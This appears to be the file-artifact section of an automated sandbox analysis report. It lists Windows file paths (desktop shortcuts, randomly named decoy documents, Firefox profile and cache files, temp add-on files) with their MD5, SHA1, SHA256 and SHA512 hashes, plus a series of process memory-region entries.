C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 cc7b4e1bf018d155945b3dec2fc29d49
SHA1 ea64874eec1e6972b824983e26c21d5b100912a2
SHA256 5407351ffefddd734369f1a360370ada4196f1a3686cfecd80bb184d4db81288
SHA512 a772fb14afbf0a8249c04295e53035eb7fdae0bc869e529d5ae1452887c2d64bd7f9dacef003f12858a6899ff823442074b00b7ac0dc53dff4f04d3385e4d64f

C:\Users\Public\Desktop\Microsoft Edge.lnk

MD5 602ca407fdc0646f96a0dfb0fb3eb76d
SHA1 eef6dab204532c90f405cd28a92e7b8026a1a210
SHA256 6086b0b6cd41f2bd7276549520b87ad95244a3a4cb9d4b45fef916249c9f5d6e
SHA512 2c878d61824523176482090f5189f4122c9c9877d30a443492cddc261343e9b388d7a29c79a280903598f01e20963a639d4356d5ebc0ed906e0a15d0e162d603

C:\Users\Public\Desktop\Acrobat Reader DC.lnk

MD5 215ec25271ca51b5323a7c3dd9aae784
SHA1 af4d9e5c2ddec9f17d48ae1be4400fe946a5f3e3
SHA256 08b3abb45e9a9a8ad92770067bf6c482ae3452477f0e73558e28872c12d1a05e
SHA512 94caf4773ac560ed8826fb47e8fba07eaecbf9c6528cecb8c1f18f208467abcb78039ce89880939c7f1d5374b0b5c03fa25642398f81e130be764467f8af3954

C:\Users\Public\Desktop\VLC media player.lnk

MD5 aa9ee5aadeea559d493b35b4f9fd073e
SHA1 69fb8e5d4db05db1ec30b13ea1ffefeb2d42ad37
SHA256 94ebb81085fffdc8c1def1f1f88cf016a95c5a43c08e45cd304c162a277b0d8a
SHA512 b2b50d1b4881075d6237c5cb2bb0a70c2a5496aae96d9e7766472894339f2093ac4f593b0ad8f30272193af819d76c32a3fa03ebc6dd664a88c2277f97d88310

C:\Users\Public\Desktop\Firefox.lnk

MD5 b1981659850590b997822df37d917bfb
SHA1 a5b65a89bd9145f00aacb1f52b3273e212f0b381
SHA256 ac49cc9d70283c74058cdc0fc68077b18ee3cd4cf9702e3d746e68b41b47a1e1
SHA512 b5abb283ee6fe345b673ee0a78ebddd54bf9208dfad44b04d0aeb58209e7ceae00d3ea948380a688b1939148c173b839f1e3edadcc910008694662c0b9a093ef

C:\Users\Admin\Desktop\RemoveReset.aifc

MD5 be3109dda8da7dc902ba5df388a6e3c2
SHA1 cade4c778609504e8cb836d866ed06570d2a71ec
SHA256 1a9e6a53cd824a9c7752197f321b86493be08df6cd2e8a8e47593060271d581b
SHA512 8a977734ed686b44e9da5945231db215bc0a25dca4f7c60b99b7e33ac070a2c42874af44f94b4daa776e8e398a86789f7aa52f4bb3524c0d16fc747edeeb0e0f

C:\Users\Admin\Desktop\BlockSubmit.ps1xml

MD5 a1a9242fadd7b3825b2068d3123f02ea
SHA1 c85108e4ded1c1b5037f8b70a8fb8f8f4dd0b090
SHA256 75589ab527b84637ab99e8232964286ec058b3876c53c2be0ede0af75aead076
SHA512 aad804f0a9153c5f39784a7148bc4157eea43809ab2bf3476c5b230c78b3f1d1b763083b07b8ac8c0f4d8a56fd3f96d22d53cc5dca4bc1a05c254f2659a056d6

C:\Users\Admin\Desktop\CheckpointUndo.vssx

MD5 f2b102ae2b95dc2c0f597109b84526ca
SHA1 2af599b839ae1ee03259ee0ac3df164e53a58eec
SHA256 b072be6b5ccf7cf1269047df7093fa6755a64091fb2dfac6f0dc471b98b13298
SHA512 efbb57d687828726c82dd68b3b78e0261ee689f429ccd87bfe54d1e6c3eb3dc1d8f99244559e376c07cb4bbb8b304b75acdec105644a8790eb0958ec76d0129e

C:\Users\Admin\Desktop\ClearStop.odt

MD5 3b133708c28f214046ca120674c2b869
SHA1 1131563efed560b11895d9053ab902db092adb0f
SHA256 0bde7f29bbc0d06a3a84116f3dc0546c3747c52fd5fd7b70442199f5a2047214
SHA512 cbd52e2db0a7b1eeb587003cbcb7c0ba454ffa1157c7836c4a60d7d723200b5e04a8f4450d2ef468524e238a24242a32e711786e775537ab6d12e9bdc2a7ef3e

C:\Users\Admin\Desktop\ConnectSwitch.xlsb

MD5 c16829dc4a6ee46731f9c69ad285cd55
SHA1 62e699ed2aa305d79c689516362145202b2ff703
SHA256 2188cf1138d116b5686948ad0bcc256279b778c34f9080df0c522954cf470eb0
SHA512 109d0055c258fdad90d74882eab09cc4c516736cf6af7b61354b955fcab96a126872797c19d8d91f4679010ec1fc701b0dbc8d1af9a2e0359d882a54fcb3ad4c

C:\Users\Admin\Desktop\CopySwitch.wmf

MD5 1ec753deaebfb5cd7096296fe5e9fc10
SHA1 86ca2ad50017598dd5198b351b1116f03d4daed8
SHA256 63d341bca97011679d1f49ee681867046021d8ec7497153097212f5efe34b3c9
SHA512 bb12688698cd5ac0e6cdcc5d07fc4e5bad6b9513a312d789c4ae6b253ec6dc6f61e77518445de0de8f92ef7975b78eaed307832fffdfb90971266ee827adb4a0

C:\Users\Admin\Desktop\DebugInitialize.eps

MD5 6b3eca8688b491c0537af9dee804adeb
SHA1 0b6e45d3e81de0e8210ab60ad9eee1f6053f7e41
SHA256 20009089e7765ad56af8a058e676f044ed5a53b1c2ea15192cd71294fa0874db
SHA512 a2dfc22baf4261a91c76541cd219ab50084b935cf5368be19419f07512c16949ae97e68ee73aaceb6693ea67181a2e0614730530dd2412aac511c967b2018e46

C:\Users\Admin\Desktop\DisconnectRevoke.ps1

MD5 e984225860e85407167c9d39334dee61
SHA1 2e5f9711eaba1f3e6fca25d8b21d16e102fa8979
SHA256 fa1f827bbd2cc1445815242014a5409605c3f2e742de1e4f3b87626049860782
SHA512 cf3e706d7903df585f6d8ae18c813eddfd5b435a5e1759ae622769b5ff9d0b50db56e74487b987bc097eb8b48e8c2125e710846446cc0572b3c95159ca492fde

C:\Users\Admin\Desktop\RepairResize.snd

MD5 c296bbd6cc5a56c6170fbc71b69d52c5
SHA1 11109b9ecae83771d5d183da8a40d07938458ac8
SHA256 2f55d55daeee7f0c980ca28c18f0e878f30375947be5c642e065978a33d6573e
SHA512 f97d8c306e8af919f7b179867bcf55a8f6efcce13c35b5a8c8e6c07bec97dbbd3ec684ed563ca7fb1f04ef9e39f2f42000734749c4100b3d85d5e68a1ad9dc6a

C:\Users\Admin\Desktop\RepairUnregister.emz

MD5 2022a3229437e4b3b4d4efe1f391ef0d
SHA1 99c01096460cb7e23e7a14462068fcb33b9c08e5
SHA256 605d84e459fc529abd7721b28926af51471206376e3b37f0407f0b554bb77100
SHA512 999f545ddb505289eec6d266462b202346ac8bd0d95e716bce082e1039c2e4add0544c9634d531d1330536be7c4c2913267a6adf1d7dde42a6cc5b92c99c2318

C:\Users\Admin\Desktop\ReadPop.eprtx

MD5 66b47d0c367b4d5dbe7d9ec9f6812fa1
SHA1 7aac07e7c16ab2754c290a9c85fbc798aee5d0c5
SHA256 fe06f3efa923edd4beed4f79ffcfcfe1aa44a39cf3b66b440ec71f375108d0d7
SHA512 12983e0b9f5b0a5f7e5852e2618dbede8b085e07c3ca126d455671bb2a3553367c19d5b1d2966725c62c8b34e98ab44eeffc7b602b66f45d36e4276504dea09c

C:\Users\Admin\Desktop\PushSync.mp3

MD5 d292d6be812bddbcba72ee162df65f2a
SHA1 2299cea94acee53c97bc727797bb35ff592008ed
SHA256 a1da4657389c531259f4987cbf95a2458470c183f05401cc793b9c256d9e2808
SHA512 c23f59b98599976499e1151905f877152167e700e0bf7f8e6f699e9f5f92429ae567f62cdec7b904ec0a0925b82e9972d738563d523c51ccad3daf3636b4c6bb

C:\Users\Admin\Desktop\JoinUse.raw

MD5 b027902f361298ddde499a32725ecc40
SHA1 f207ff1b6f67941a1f70e4465d4bfa5299808a0f
SHA256 34252ccad4de71651032a9946839698b179158c9ce0ecf75ce9fae12238e667b
SHA512 72a9f5501f815bfd34ad64208600f75425393403e88a5c10c489a74da1acc2ab44e9d20469bab3e094630f374b392193db1246ec3472f164fc0dc6fc6674b04f

C:\Users\Admin\Desktop\FindPublish.css

MD5 1e420e194b9484e5933d3ceb010a0732
SHA1 63048ba5c383730ccd1b55df1e4da0b4a035ab9a
SHA256 0c2525b85be2b07f084284f967fcc80888aac2952824379cca2811557107b5a3
SHA512 7096d5117f58e593aeddeaa453ba1c25377160248d86473d1462776585c9e45ff833f790e42be3392b55ac3528d55a496dd6e4e5f75b75dc566c593812c06318

C:\Users\Admin\Desktop\FindConvertFrom.vdw

MD5 dd6b7fad0f836503bedfc382bd160f9b
SHA1 305fa24835b39e14a5dc7c7dee8f778723264718
SHA256 ea63d7a2673f030efbd70edd3cc5b1f235a0eb966a8db323af6123e9879510bf
SHA512 a27c850178c8a3dce2ee34b2317c307334c4311b7e3d382f766fec1531548d68b53d712e8ba7043da503b77b8e8a6576cf4974b6c9a44e75087b84bbb4e589f3

C:\Users\Admin\Desktop\ResumeGroup.jfif

MD5 b9dba631a82f55358b4106c4c55384ff
SHA1 b51c9233b4cf9c13ddbdc257466c9beef96d7e68
SHA256 4230f7a2f98630dfb3c1ab8426f9b7053d1946a770e54fb2681c5317a379e113
SHA512 3e154a7e90ccd39af849d408dbd8a4ba0cc0a385ae9c859cc179b2af4e343d3a91210708e7dbf127e7125e856425a35fa4543eff2a1f6e51053ca9b6f7576d52

C:\Users\Admin\Desktop\SplitEdit.emf

MD5 173d3e1a63052e2161488950a9a56224
SHA1 43d99a14996943642479593205773d2d892ee615
SHA256 234bafe4ed32c447805fac34557d2fad13427af56c4e670a3df29ebeb34c5d06
SHA512 8c93dec47b7381b86c5ed3d06edbf87defddca129dff8cf2918e337828e8de6c7e8e924bf5281c387d25629b98832b114ea644d5fd5d3e953932a82680cbb108

C:\Users\Admin\Desktop\SwitchInitialize.edrwx

MD5 fe730f4d49ecb33c089f96fd113dadee
SHA1 b728245ba7e2571b7aaee583b814698cc4c92707
SHA256 5dce590d1f17f40644834d5f2539c0b09ef16c99e13cc4f73599ba4864a3e2a9
SHA512 51a90dcd289a75907d16302c9072cb3a461bae13cdefc4db43c372f1fa5c1db867f2750c46f4d2b2b387bbba934dd1f881a69c80031d569202e1ef516b0d511d

C:\Users\Admin\Desktop\UnpublishExport.wmv

MD5 507270c2b5cfa05c7d93a7ccbcda2e4c
SHA1 dc705d0b060d7aefc33de660e2c4755121a11115
SHA256 61494914130789575685f4919a8298a3c067378f9cc26455c4d0973947c53de3
SHA512 fcd5dcb7465ee08f1a417f438c3c4853f21972bc0ddd298465f314c477d573035798882f285e0df76989172a7ccb6e58e86918fb9d50bbb6399c18e01f9d06d5

C:\Users\Admin\Desktop\UnregisterGrant.mpp

MD5 3620829aeab82ab7ac443e1f62fc2cb1
SHA1 78a5269f7612ffaa8da22ca965337f379051dc82
SHA256 7a641541c0fe9940961cc74e86a3e4ef814648583fb80ceb5b13898cac1959dc
SHA512 a8c6c2084db70cad537d4d0c9248b114b11c49992be7225f1be89f091a337b5b5177ed62981c511aa7ede4bde29a14a0b6c71f5310cd466cf825db4b12daf11c

C:\Users\Admin\Desktop\GrantExpand.docx

MD5 02aec5ac60880571afff32de4e3cadf8
SHA1 ed0803194467ae357d0a6e969b876d2b1084ca74
SHA256 b6472115606393b296d8d68ed7a92c9fa31a1462c9bc5c04e6b9bc4e32d863ca
SHA512 3cee5c88ce9ae22d31aa6d224440fbbe7ce20efb1d91c11816e05345410df643e99ca88d7fda22803fe8409e0683da484cd71cd8f5ea987c8308281f5a7fa9a8

C:\Users\Admin\Desktop\BlockPing.xlsx

MD5 fcfcbe5e81b7412806b162d68baff908
SHA1 14eb14f94a0b3a795233cdd934fd14bbc1326d26
SHA256 d4fece678ea5e72e675d56c32ac83b20a2d283e682258c0b6fdca639836a253d
SHA512 d95f47bd53fb960290f4e39893f945a5edfb34ab57582eb119be2fb4bc777ea2742151878b3c9cd25bf32b82a0891203f639105d2a2749405d0a85904b5ec7c6

C:\Users\Admin\Desktop\ResumeOut.xlsx

MD5 6c8b85389047613b4219985098d60077
SHA1 5f69ce5cd8942e997390f5711e59299a4406f84b
SHA256 74610b1373b1ce22522f0e97a3d5007ae3a8753db8583cbcfa96508f786dfb6a
SHA512 30586c26f17f82ea241079b3cba6a88d6fb80071d0b2fef0ee75beaaa97639182eb596dc8aa01ea7c0e447f2a8b9aeedb7b28216861a5536818495875bb5872e

C:\Users\Admin\Desktop\ExportJoin.xlsx

MD5 1cb8b20e9415700ee6deec6d4230acaf
SHA1 6845042d57a8f99c7330f09eb3e728f0ddfb544f
SHA256 35af76f4194ed7db335fe66d7fa46c63850aa6d5489241cc1179e629e5b26700
SHA512 030ef417192f104254f90284ab0fc02ea18d4e4a2fbfeb7cc4bbc89c0106e20ad254166c5698b27fdc7f1c7ae4511d47a9aba21eb359980af63d16b685eccebe

C:\Users\Admin\Desktop\StartRepair.inf

MD5 0f49b97efcd631553e82ddced93cbb3e
SHA1 f4445110377a5b7748400f9a648d8065c8e07000
SHA256 7d234d184ba7739fead28dbe54d60884e570e897a11e9807f25ea6be31ba2446
SHA512 a9c7db4c359c53eed7a8393e71060d299b6e77fc4ff8b3821bd567ecb1ab17abdb53dc05805a3c7ee4273e98ca9bc13f287486be161d8c2712d6a9e0cc5d2e5d

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 a94de23dcefb96299d68ee22bb7253e3
SHA1 40cad3fdbaf4c6ea13f2282bb41174bacbd8584c
SHA256 112d51315329d5e2f771ced0d3944247c6032004279b2a67df7743d9602a7afd
SHA512 1d3de7c4e4eb1c6d9911ad6fa968744ff2d53604073089cd59b0ee1bdeccf14650582ef700eae90da89d38eea2b7e8e4e2960c2955866f9cb40493fb0a850a07

C:\Users\Admin\Desktop\ConvertUnblock.xltx

MD5 0f3f143a05221f99f87582089267c0ae
SHA1 95dc04033097bc9c2839a13734702dec4db97b1b
SHA256 ae9fc000778a79a0eed090e8aae2ed9856f983323390f8ed909f824e8bfcc6bd
SHA512 09bd970e6a5bea31a79c4641e5914e525dbf25bbcafa1b49565da885aa34534c3c43b628a1bf446a34fd6f6ab3d4c1e4b846558dc3060788e434e6cd96d23d16

C:\Users\Admin\Desktop\RestoreSend.xltm

MD5 eaaa855d828dbf659cbdf2df6a40fedb
SHA1 614ae8a359d93f3045e468190eb60ff7936b87e7
SHA256 30712ed409e71620e0f6d867e427dd371da1e2b02a9cfefbb8544c3cde0775b2
SHA512 c3935105ec09ba2f16ff65c05ec013e80f08ccf3848c9febf84e8bb1474b2666414856bf567db81e2cbd46f95aeb0c9120225c33302740026958ac9ae7639c70

C:\Users\Admin\Desktop\InvokeRegister.lnk

MD5 57bd40ecdb8dfca447ec375cf2012741
SHA1 8aa874988ef801c08692e6900d9f71961b5d8f7e
SHA256 2fee3ddf30f3de17499064392572a3ff8277f38f03f9c4890160f4a7ebe4a48e
SHA512 01f6f0afaa8b2ac5ec3405526ebc0c4cbe00102d9108eecbdebbd78c559eea09a44ae7341ff1e2b9e80ebe96f2cbae818add0690c2d50a62d52af09d2a2674eb

C:\Users\Admin\Desktop\UnregisterInitialize.jpe

MD5 c7444d6a80890242ca2727e061208fce
SHA1 d12b810758638cd3d28fff5e48a1eef0fceb2ec4
SHA256 a65b1020dcb4ae97f624594f0694f703cf2c34692b20233ad5c6ed977a27d75b
SHA512 854e22261f1c63371efb602e6d287cd222664cf95e69fedb72004af996fb5fcb4b852a5bb051da45f14e502c4552e01755ec6dd53540fa7a40f556d87e9ef648

memory/4684-35-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-37-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-36-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-41-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-43-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-44-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-42-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-45-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-46-0x00000264DF530000-0x00000264DF531000-memory.dmp

memory/4684-47-0x00000264DF530000-0x00000264DF531000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\activity-stream.discovery_stream.json.tmp

MD5 89887588e6e8ee5d20c951243250c0d6
SHA1 c17d71bf1b197da2c3a2d653469068f320d90fed
SHA256 b2bd6c90f5dbda8dd857571d61a3e23f2f7677cc0ac73f97cef38994bf8a67d1
SHA512 20f79224788893970ed043873aa4759f560c8d515dd236ab668a8dba0dded0766cd7c0c035a824fd75257ec03d2da3c51663f40c1764b385b3b54cee56ff6daa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\pending_pings\8004a856-ff98-4641-87d5-c9b2271ef45a

MD5 e11d22c9cb33cdc8324eafbf0d323f2f
SHA1 cbca38d898a1a61cf744c5e6b4a842c16ac79137
SHA256 1dca1f431255ecc82bf6301f117b84106454120a1dfdd30251d71c371941629d
SHA512 305e0fa13da9f7fbfcdb98539db1209bb02443dbc59a180438da69b49600a23ddf1663bb9d0b8fb1db69f62b57e4cdcf470e5a14cf9a64bc192bc5cbba2cb3d5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp

MD5 9b76ab4ffb9e9f9cd98d1b7e8c64157f
SHA1 e8281ebf39f6f28b56c9c631ff0151004f531f40
SHA256 35e418cc7aa609ebcdd5092985bb2ad17e749cafafcf31642efc8f6333985bdb
SHA512 dfda7e1f44cd0e95ecb94789960073952c03b7d65f2c1fc6bfcb5a8482647ea93459a5ea58813a9c53244f8c823a04ddd29c58de2858004b6b4b7225f75acfb2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\pending_pings\6f058607-ff01-4bef-8f1e-6a74cf509ca0

MD5 841c7ab37c25a90e55cba59ae1d0a6c6
SHA1 8666e10e5e56e8a9adad8929412fd65d3f38a8d5
SHA256 dc694f98f5512f3c19ca73420bdefe14965c1add879f4e611b5a6929bc613132
SHA512 7f7faf222acee476c7bbc5b39d2c5006be99df65033c94817cdb0b1e3f6c4ee4a95f9b637e88be972cee5a727f8804959b13e6f78e10174dc72b5cad3d46894c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\pending_pings\37a9ec45-387c-4c94-aa25-948d90afc8c7

MD5 acbe98800cecd85970d18bec3cc8d60a
SHA1 09a09647648b19d2176ef6a9ca78c4eba29d4f32
SHA256 7191db9b1bd31e6c4389cb34ecf852e64d01017636e2c0f14c348650e43bcd24
SHA512 2cd538d3ee4398b4d318f5aaf51f15cfbb9309c4c373f3969b90ca5e61d9e217582535a886f180b0a57ce08860e7be2199cb001cacdd989a627c61ca405c2870

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp

MD5 dd99da3b3b8e71a8eacb305e1faa80e5
SHA1 e9697c1bdc2e98503aacca9565191d872c2a7742
SHA256 24b78247ca2e74a3e25f1a28dcf3a0f1fb9bb236646ff28b5efbb137b14e5c75
SHA512 595f85db4a50940b7cf80c503520db485926ae5fd34dfcb6b2eeb510cf87e5114aab5600fbb7a1e1a146bd2fb95cb49b82126419f02f4796fc8dafdd5bc70f9a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js

MD5 9c4e9e1f4a57a61fc02617346674f360
SHA1 9fcaa81a02d733685ac364e7c57417fa34419f99
SHA256 e23478ea6504e173a0b82a4667cafb575bad8ba9acdd007a11defb99799555d6
SHA512 2619e7210f5a45a03f446742d74bd3a6dfc57b824e4d38de807ec7a3b17151e21a1561d9c3dbac368defc9d0774d75b0cc8d572012e3649d09c1f786871b6518

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js

MD5 caa8f806316d1bbba70de46bf49805a2
SHA1 c2fe6a3a4facabce336db3dc5b2a90a253f5e5fe
SHA256 3309a94e78a197ab7cc982ca5a53eb797d05af21e5e635fc448ad1392edad949
SHA512 526007fbede154a0b48ea72fae37efe6cc41434f5d0b1eb319a478d8c308ed9e3a55fb7c37d98ac0c734e2b6dae8ef252c3b31ed71b895d57b6b9b3b126ad491

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 120b7f16405ff21fc43a5aade290a11d
SHA1 1d80cc3e747ca5b7532e185e092b22784301c3c8
SHA256 7d0905bea6b223308f7e4b3a6cfbdd6439a0e3ade57b43ea7a86eb8cfa8346b6
SHA512 621f3484b65fbc86cdfae4cfa7be8a329c85f4943a415249c57dfa54d333386af61b2c418a2efd603a15ec0c27446ea8a3ce73938c3b506ca62f014b618a8ccd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp

MD5 f8000103af7059898fe8b780d67afaa4
SHA1 97cf04e53ae9da345257061b892ad99e67b6380f
SHA256 85eeb0876982d14f7338683fb0888245678c2f6086787520ef627cf73a03a73d
SHA512 e6f2b648ef72932bd7baedf027a028acc5c4b2f97c409f39c779ac329979aebf7ea9acf4d3e90af6283cd690e9fc1096ccbdb545ea90c11d7db24341605024c6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js

MD5 70e7c1e377003ad95c873da50fe25d0a
SHA1 402e9406cebcf0d97cc914b77bd687bfd28fd3de
SHA256 20a07b6ca352d46a9022c4881d725152330a92c2c2e01d9073ceb1cdfad1252e
SHA512 28466613128fb8836aa53d91788ab825187cb733fa3ae815ac6ac0cc3c85611a0125d330c7579b1bf7b8bc0ed7017c1cf59e7ab034fbac5b49b16f110c04c32f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\AlternateServices.bin

MD5 19cb849bb669e87d5902ccfac922a271
SHA1 2a4d2c34fb50708f8978a5515072d4bceda8a15e
SHA256 17f33520288fb5d922a8bae943580ba51be4744936f87f7fa7eb80f299fc2eb7
SHA512 94d2cf4b03448e1650546b825a405aca76430c295abf6d42eae5a5f81d3585e46e3041e45ab73d031dd95bd8ad6ce0e71f75dc874dedd151ce3d22072b05b0b6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 893f39cddf5f11a1a8be7b4fba89a773
SHA1 5729be345d1ad1062b522b282b7febf53383db26
SHA256 95738b5901b7b107161fd4d99b7827230072bfeb3d2fe9dd2281cc41b881d1db
SHA512 d81bd904e218572ee79e217c1497be537f7adfc0fdba364872e4952ce2cc3cd2dbeefc082f36dac4c85e29839c3bdf29618be0cdc5b6e8e4ac024eaf543527ed

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js

MD5 e6f1f74a5ad54b91c8fa35da2f8686ac
SHA1 3887c0c8e6ec02b70ac3d2342cbc89cb3ed3bc17
SHA256 be88bcb4de3e66ac4e9096de56d862ad3ff20ba63c1afee16ba0f2ae5cab56ed
SHA512 b26f1f945cb01ff007f4a2ed54a31a4d6ee405351841d65bad3ec55d8e34b6a51f3e25f3a2e6ddfe04bf94452f22553c404432031ea5d40e7fd98d86219b8883

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 c4779d535e85f167f63721ae4f3c18b1
SHA1 cc2b2b0da9339c0f50da89c1f5218385d424a1b3
SHA256 fb3acea8bdf9d30f27e95344bf4fc485c370f113574562147324cc2d9bf693f2
SHA512 cb223be7acf00149f7f173265e3f07b0655b06ba365978caf41c14d192d22f87d6ca5157ddc75eac40bd4effd0d35437147ad2ef6196e33354686960cc297a9e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 f71b0cc01fa06e8f1ceb0b0d770aa496
SHA1 c25f0230a9ca496b5d71894359502018cb71cd8f
SHA256 15df6a79a27b06be23bd3a01f913eedf0e380012bbb1d2f27739091145aee4b8
SHA512 e36607ccd11ca110e06b6185f0b2b914ff9a29d4f3844d89c3ad9b9a30299aea94f6e0fd36f6199532ca2ab5607b86c5faec028dba143eacc813430da94d755f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 d4899544377a5962e0e587249d36bc0a
SHA1 5c2402ef74dac69a808119757513a240b5e6fa7f
SHA256 caceeeffc7e3259cb3cc1068846fb2ba0c5a25c96dbc2140f9d912995eaa3da3
SHA512 13a3f2b97f9b59539ab6c7d232f1f1077dfa611340624c923504f4d5c26775c32d95a118ffd37d5bc499cd6c3525b109fda075a899700ce5645b5c77f651338a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\cache2\entries\F8739A87D71C0840C4C45B3DD870F41F8148DA67

MD5 bda4d4978cb369fffa64d3dc7e06deb9
SHA1 af47996ebbd6a9d1bbe6c58fb8289afa9c1fbab6
SHA256 a702d6fe0ce141238601257b309fc9726f958bbefb58622bee98b52459581a8c
SHA512 9ca1fe58d7a3a1b33b513ade742724e73711a468549689cb917a151a27101268e9bbf8fb0dad6c676c90db2b139deaa8b8e4bae0177dbd546a75eb4b8463c006

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 b5698e4598d33da2a8d03bcaff28fea6
SHA1 09c5c5fbd86db63e569144bf6df5d99f1da62c6d
SHA256 9cbf16cbf5a13110b845f1e4906eef7b2200cf4881d5f3911f6fca1c43b2edb1
SHA512 cc236dfb79969dd1a8b1a75ad755412859cc4d2e9d20d36f915a1a3ab8c5a4e45dea2995fc9bd16c242225d8da606ad739c6a779b252ce6c940b3d7ae39db64c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\jumpListCache\6SvKmhkbqYYFGXN3qNlejYBapcfZkuGTp6DxWfBgaI0=.ico

MD5 c9da4495de6ef7289e392f902404b4c8
SHA1 aa002e5d746c3ba0366cd90337a038fc01c987c9
SHA256 13ec8c9e113de6737a59d45ea5a99f345d6cba07f9a820bb2297121b8094790f
SHA512 bb72f0cc815e7b4c44959808b153aad28dbced8d97e50f83ef90229d19ea1c4b3fffff650bf49efe562451fcae0325cdbdffc1a5c4ec5d2c7c70ae9d1a0d8a16

